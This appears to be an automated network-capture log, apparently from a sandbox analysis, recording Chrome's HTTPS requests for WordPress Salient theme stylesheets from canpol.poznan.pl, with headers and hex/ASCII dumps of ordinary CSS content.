                                                            2025-01-15 10:07:56 UTC8000INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 37 43 43 43 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 62 6f 64 79 5b 64 61 74 61 2d 64 72 6f 70 64 6f 77 6e 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 3a 6e 6f 74 28 5b 64 61 74 61 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68 65 61 64 65 72 22 5d 29 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 3e 20 75 6c 20 3e 20 6c 69 2e 6d 65 67 61 6d 65 6e 75 20 75 6c 20 75 6c 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 3e 20 61 2c 0a 62 6f 64 79 5b 64 61 74 61 2d 64 72 6f 70 64 6f 77 6e 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 3a 6e 6f 74 28 5b 64 61 74 61 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68
                                                            Data Ascii: und-color: #27CCC0!important;}body[data-dropdown-style="minimal"] #header-outer:not([data-format="left-header"]) header#top nav > ul > li.megamenu ul ul li.current-menu-item > a,body[data-dropdown-style="minimal"] #header-outer:not([data-format="left-h


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.1649720178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:55 UTC609OUTGET /wp-content/themes/salient/css/magnific.css?ver=6.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:56 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:58 GMT
                                                            ETag: "2783-620a8e92d7152"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 10115
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:56 UTC7913INData Raw: 2f 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 43 53 53 20 2a 2f 0a 2e 6d 66 70 2d 62 67 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 34 32 30 30 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 62 30 62 30 62 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 38 3b 0a 20 20 66 69 6c 74 65 72 3a 20 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 38 30 29 3b 20 7d 0a 0a 2e 6d 66 70 2d 77 72 61 70 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74
                                                            Data Ascii: /* Magnific Popup CSS */.mfp-bg { top: 0; left: 0; width: 100%; height: 100%; z-index: 104200; overflow: hidden; position: fixed; background: #0b0b0b; opacity: 0.8; filter: alpha(opacity=80); }.mfp-wrap { top: 0; left: 0; widt
                                                            2025-01-15 10:07:56 UTC2202INData Raw: 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 20 7d 0a 0a 40 6d 65 64 69 61 20 61 6c 6c 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 20 7b 0a 20 20 2e 6d 66 70 2d 61 72 72 6f 77 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 37 35 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 37 35 29 3b 20 7d 0a 20 20 2e 6d 66 70 2d 61 72 72 6f 77 2d 6c 65 66 74 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 30 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 2e 6d 66 70 2d 61 72 72 6f 77 2d 72 69 67 68 74 20 7b 0a 20
                                                            Data Ascii: align: center; padding: 0; } }@media all and (max-width: 900px) { .mfp-arrow { -webkit-transform: scale(0.75); transform: scale(0.75); } .mfp-arrow-left { -webkit-transform-origin: 0; transform-origin: 0; } .mfp-arrow-right {


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.1649721178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:55 UTC611OUTGET /wp-content/themes/salient/css/responsive.css?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:56 UTC281INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:56 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:59 GMT
                                                            ETag: "2328e-620a8e93ce25d"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 144014
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:56 UTC7911INData Raw: 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 33 30 30 70 78 29 20 7b 0a 20 20 2e 63 6f 6e 74 61 69 6e 65 72 2c 20 20 0a 20 20 62 6f 64 79 5b 64 61 74 61 2d 65 78 74 2d 72 65 73 70 6f 6e 73 69 76 65 3d 22 66 61 6c 73 65 22 5d 20 23 62 6f 78 65 64 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 74 72 75 65 22 5d 20 68 65 61 64 65 72 20 3e 20 2e 63 6f 6e 74 61 69 6e 65 72 2c 20 20 0a 20 20 62 6f 64 79 5b 64 61 74 61 2d 65 78 74 2d 72 65 73 70 6f 6e 73 69 76 65 3d 22 66 61 6c 73 65 22 5d 20 23 62 6f 78 65 64 20 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 74 72 75 65 22 5d
                                                            Data Ascii: @media only screen and (min-width: 1300px) { .container, body[data-ext-responsive="false"] #boxed #header-outer[data-full-width="true"] header > .container, body[data-ext-responsive="false"] #boxed #header-secondary-outer[data-full-width="true"]
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6e 2e 6c 65 66 74 2c 20 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 20 64 69 76 2e 73 6c 69 64 65 72 2d 6e 61 76 20 73 70 61 6e 2e 72 69 67 68 74 20 7b 0a 09 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 74 6f 70 3a 20 32 33 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 0a 09 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 2c 20 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 20 23 66 65 61 74 75 72 65 64 2c 20 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 20 23 66 65 61 74 75 72 65 64 20 61 72 74 69 63 6c 65 20 20 7b 0a 20 20 09 09 68 65 69 67 68 74 3a 20 34 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 09 0a 20 20 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 09 7d 0a 20 20 09 0a 20 20 09
                                                            Data Ascii: n.left, .orbit-wrapper div.slider-nav span.right {position: absolute!important;top: 230px!important;}.orbit-wrapper, .orbit-wrapper #featured, .orbit-wrapper #featured article { height: 450px!important; margin-bottom: 0; }
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6d 61 74 69 6f 6e 3d 22 66 61 64 65 2d 69 6e 2d 66 72 6f 6d 2d 6c 65 66 74 22 5d 20 7b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 0a 09 2e 75 73 69 6e 67 2d 6d 6f 62 69 6c 65 2d 62 72 6f 77 73 65 72 20 69 6d 67 2e 69 6d 67 2d 77 69 74 68 2d 61 6e 69 6d 61 74 69 6f 6e 5b 64 61 74 61 2d 61 6e 69 6d 61 74 69 6f 6e 3d 22 66 61 64 65 2d 69 6e 2d 66 72 6f 6d 2d 62 6f 74 74 6f 6d 22 5d 20 7b 0a 09 09 62 6f 74 74 6f
                                                            Data Ascii: mation="fade-in-from-left"] {transform: translateX(0)!important;-webkit-transform: translateX(0)!important;-moz-transform: translateX(0)!important;}.using-mobile-browser img.img-with-animation[data-animation="fade-in-from-bottom"] {botto
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 64 74 68 22 5d 20 7b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 2d 37 25 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 20 20 09 0a 20 20 09 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 20 6e 61 76 20 3e 20 75 6c 20 3e 20 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 20 7b 0a 09 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 44 44 44 44 44 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 20 20 09 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 2c 20 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 20 23 66 65 61 74 75 72 65 64 2c 20 2e 6f 72 62 69 74 2d 77 72 61 70 70 65 72 20 23 66 65 61 74 75 72 65 64 20 61 72 74 69 63 6c 65 20 20 7b 0a 20 20 09 09 68 65 69 67 68 74 3a 20 34 35 30 70 78 21 69 6d 70 6f 72 74 61 6e
                                                            Data Ascii: dth"] {margin: 0 -7%!important;} #header-secondary-outer nav > ul > li:last-child { border-right: 1px solid #DDDDDD!important;} .orbit-wrapper, .orbit-wrapper #featured, .orbit-wrapper #featured article { height: 450px!importan
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 65 64 20 23 68 65 61 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 75 74 65 72 2c 20 62 6f 64 79 20 20 23 62 6f 78 65 64 20 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 2c 20 62 6f 64 79 20 20 23 62 6f 78 65 64 20 23 66 65 61 74 75 72 65 64 2c 20 62 6f 64 79 20 20 23 62 6f 78 65 64 20 2e 6f 72 62 69 74 20 3e 20 64 69 76 2c 20 62 6f 64 79 20 20 23 62 6f 78 65 64 20 23 66 65 61 74 75 72 65 64 20 61 72 74 69 63 6c 65 2c 20 62 6f 64 79 20 20 23 62 6f 78 65 64 20 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2d 62 67 2e 66 75 6c 6c 73 63 72 65 65 6e 20 7b 0a 09 09 6d 69 6e 2d 77 69 64 74 68 3a 20 36 37 39 70 78 3b 0a 09 7d 0a 09 0a 09 62 6f 64 79 20 20 23 62 6f 78 65 64 20 23 66 6f 6f 74 65 72 2d 6f 75 74 65 72 20 23 66 6f 6f 74 65 72 2d 77
                                                            Data Ascii: ed #header-secondary-outer, body #boxed #page-header-bg, body #boxed #featured, body #boxed .orbit > div, body #boxed #featured article, body #boxed #slide-out-widget-area-bg.fullscreen {min-width: 679px;}body #boxed #footer-outer #footer-w
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 2d 62 6f 74 74 6f 6d 3a 20 32 35 70 78 3b 0a 09 7d 0a 0a 09 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 32 5b 63 6c 61 73 73 2a 3d 22 76 63 5f 63 6f 6c 2d 73 6d 2d 22 5d 20 7b 0a 09 09 77 69 64 74 68 3a 20 34 38 25 3b 0a 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 25 3b 0a 09 7d 0a 09 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 32 5b 63 6c 61 73 73 2a 3d 22 76 63 5f 63 6f 6c 2d 73 6d 2d 22 5d 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 6f 66 66 73 65 74 22 5d 29 2c 0a 09 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 32 5b 63 6c 61 73 73 2a 3d 22 76 63 5f 63 6f 6c 2d 73 6d 2d 22 5d 3a 6e 74 68 2d 63 68 69 6c 64 28
                                                            Data Ascii: -bottom: 25px;}body .vc_row-fluid .vc_col-sm-2[class*="vc_col-sm-"] {width: 48%;margin-left: 4%;}.vc_row-fluid .vc_col-sm-2[class*="vc_col-sm-"]:first-child:not([class*="offset"]),.vc_row-fluid .vc_col-sm-2[class*="vc_col-sm-"]:nth-child(
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 69 74 68 5f 68 6f 74 73 70 6f 74 73 20 2e 6e 65 63 74 61 72 5f 68 6f 74 73 70 6f 74 5f 77 72 61 70 20 2e 6e 74 74 69 70 20 7b 20 0a 20 20 09 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 09 09 6c 65 66 74 3a 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 09 09 74 6f 70 3a 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 09 09 77 69 64 74 68 3a 20 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 09 09 6d 61 72 67 69 6e 3a 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20
                                                            Data Ascii: ith_hotspots .nectar_hotspot_wrap .nttip { position: fixed!important; left: 0!important; top: 0!important; width: 100%!important; max-width: none!important; margin: 0!important; height: 100%; box-shadow: none!important;
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 0a 09 7d 0a 09 0a 09 62 6f 64 79 20 23 66 75 6c 6c 5f 77 69 64 74 68 5f 70 6f 72 74 66 6f 6c 69 6f 20 2e 70 72 6f 6a 65 63 74 2d 74 69 74 6c 65 2e 70 61 72 61 6c 6c 61 78 2d 65 66 66 65 63 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2c 20 62 6f 64 79 20 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 20 2e 70 72 6f 6a 65 63 74 2d 74 69 74 6c 65 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 0a 0a 09 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 20 2e 70 72 6f 6a 65 63 74 2d 74 69 74 6c 65 20 7b 0a 09 09 74 6f 70 3a 20 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b
                                                            Data Ascii: }body #full_width_portfolio .project-title.parallax-effect .container, body #page-header-bg .project-title .container { padding-bottom: 30px!important;}#page-header-bg .project-title {top: 0px!important;padding-top: 30px!important;
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 65 22 5d 20 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 63 6f 6e 74 65 6e 74 20 70 2c 0a 09 62 6f 64 79 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 33 20 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 6c 65 78 69 62 6c 65 2d 68 65 69 67 68 74 3d 22 74 72 75 65 22 5d 20 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 63 6f 6e 74 65 6e 74 20 70 2c 0a 09 62 6f 64 79 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 34 20 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 6c 65 78 69 62 6c 65 2d 68 65 69 67 68 74 3d 22 74 72 75 65 22 5d 20 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 63 6f 6e 74 65 6e 74 20 70 2c 0a 09 62 6f 64 79 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 36 20 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d
                                                            Data Ascii: e"] .swiper-slide .content p,body .vc_col-sm-3 .nectar-slider-wrap[data-flexible-height="true"] .swiper-slide .content p,body .vc_col-sm-4 .nectar-slider-wrap[data-flexible-height="true"] .swiper-slide .content p,body .vc_col-sm-6 .nectar-slider-
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 65 65 2d 74 68 72 6f 75 67 68 2d 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 20 7b 0a 09 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 31 2e 68 61 73 2d 69 63 6f 6e 2e 65 78 74 72 61 5f 6a 75 6d 62 6f 20 73 70 61 6e 2c 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 2e 68 61 73 2d 69 63 6f 6e 2e 65 78 74 72 61 5f 6a 75 6d 62 6f 20 73 70 61 6e 2c 20 2e 6e 65
                                                            Data Ascii: ee-through-extra-color-gradient-2 { font-size: 24px; line-height: 24px; padding: 20px 50px!important;}.nectar-button.extra-color-gradient-1.has-icon.extra_jumbo span, .nectar-button.extra-color-gradient-2.has-icon.extra_jumbo span, .ne


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.1649723178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:55 UTC610OUTGET /wp-content/themes/salient/css/portfolio.css?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:56 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:56 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:00 GMT
                                                            ETag: "aeae-620a8e947afee"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 44718
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:56 UTC7913INData Raw: 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 20 2e 63 6f 6c 20 2e 77 6f 72 6b 2d 69 74 65 6d 2e 73 74 79 6c 65 2d 33 20 2e 77 6f 72 6b 2d 69 6e 66 6f 2d 62 67 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 38 32 62 33 30 3b 0a 09 6f 70 61 63 69 74 79 3a 20 30 2e 34 35 3b 0a 09 77 69 6c 6c 2d 63 68 61 6e 67 65 3a 20 6f 70 61 63 69 74 79 3b 0a 7d 0a 0a 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 20 2e 63 6f 6c 20 2e 77 6f 72 6b 2d 69 74 65 6d 2e 73 74 79 6c 65 2d 33 20 68 33 2c 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 20 2e 63 6f 6c 20 2e 77 6f 72 6b 2d 69 74 65 6d 2e 73 74 79 6c 65 2d 33 2d 61 6c 74 20 68 33 20 7b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 7d 0a 0a 2e 70 6f 72 74 66 6f
                                                            Data Ascii: .portfolio-items .col .work-item.style-3 .work-info-bg {background-color: #282b30;opacity: 0.45;will-change: opacity;}.portfolio-items .col .work-item.style-3 h3,.portfolio-items .col .work-item.style-3-alt h3 {margin-bottom: 5px;}.portfo
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6f 2d 6e 61 76 20 75 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 09 74 6f 70 3a 20 30 3b 0a 7d 0a 2e 62 6f 74 74 6f 6d 5f 63 6f 6e 74 72 6f 6c 73 20 23 70 6f 72 74 66 6f 6c 69 6f 2d 6e 61 76 20 75 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 20 6c 69 2c 0a 2e 62 6f 74 74 6f 6d 5f 63 6f 6e 74 72 6f 6c 73 20 23 70 6f 72 74 66 6f 6c 69 6f 2d 6e 61 76 20 7b 0a 09 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 7d 0a 0a 2e 62 6f 74 74 6f 6d 5f 63 6f 6e 74 72 6f 6c 73 20 23 70 6f
                                                            Data Ascii: o-nav ul:first-child {display: inline-block;position: relative;z-index: 1000;margin-top: 0;top: 0;}.bottom_controls #portfolio-nav ul:first-child li,.bottom_controls #portfolio-nav {height: 50px;line-height: 50px;}.bottom_controls #po
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 66 61 75 6c 74 22 5d 29 20 2e 63 6f 6e 74 61 69 6e 65 72 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 20 7b 0a 09 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 3b 0a 7d 0a 0a 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 66 69 6c 74 65 72 73 2d 69 6e 6c 69 6e 65 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 22 62 6c 61 63 6b 22 5d 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 66 31 30 31 32 3b 0a 7d 0a 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 66 69 6c 74 65 72 73 2d 69 6e 6c 69 6e 65 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 22 62 6c 61 63 6b 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 20 75 6c 20 6c 69 20 61 2e 61 63 74 69 76 65 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 21 69 6d 70 6f 72 74
                                                            Data Ascii: fault"]) .container ul li a:hover {color: rgba(255,255,255,1);}.portfolio-filters-inline[data-color-scheme="black"] {background-color: #0f1012;}.portfolio-filters-inline[data-color-scheme="black"] .container ul li a.active {color: #fff!import
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 70 78 3b 0a 7d 0a 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 20 2e 63 6f 6c 20 2e 77 6f 72 6b 2d 69 74 65 6d 20 2e 77 6f 72 6b 2d 69 6e 66 6f 20 61 2e 64 65 66 61 75 6c 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 20 7b 0a 09 6f 70 61 63 69 74 79 3a 20 30 2e 38 3b 0a 7d 0a 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 20 2e 63 6f 6c 20 68 33 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 74 6f 70 3a 20 30 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 20 2e 63 6f 6c 20 69 6d 67 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61
                                                            Data Ascii: -border-radius: 2px;}.portfolio-items .col .work-item .work-info a.default-link:hover {opacity: 0.8;}.portfolio-items .col h3 {position: relative;top: 0px;color: #fff;margin-bottom: 10px;}.portfolio-items .col img {display: block;ma
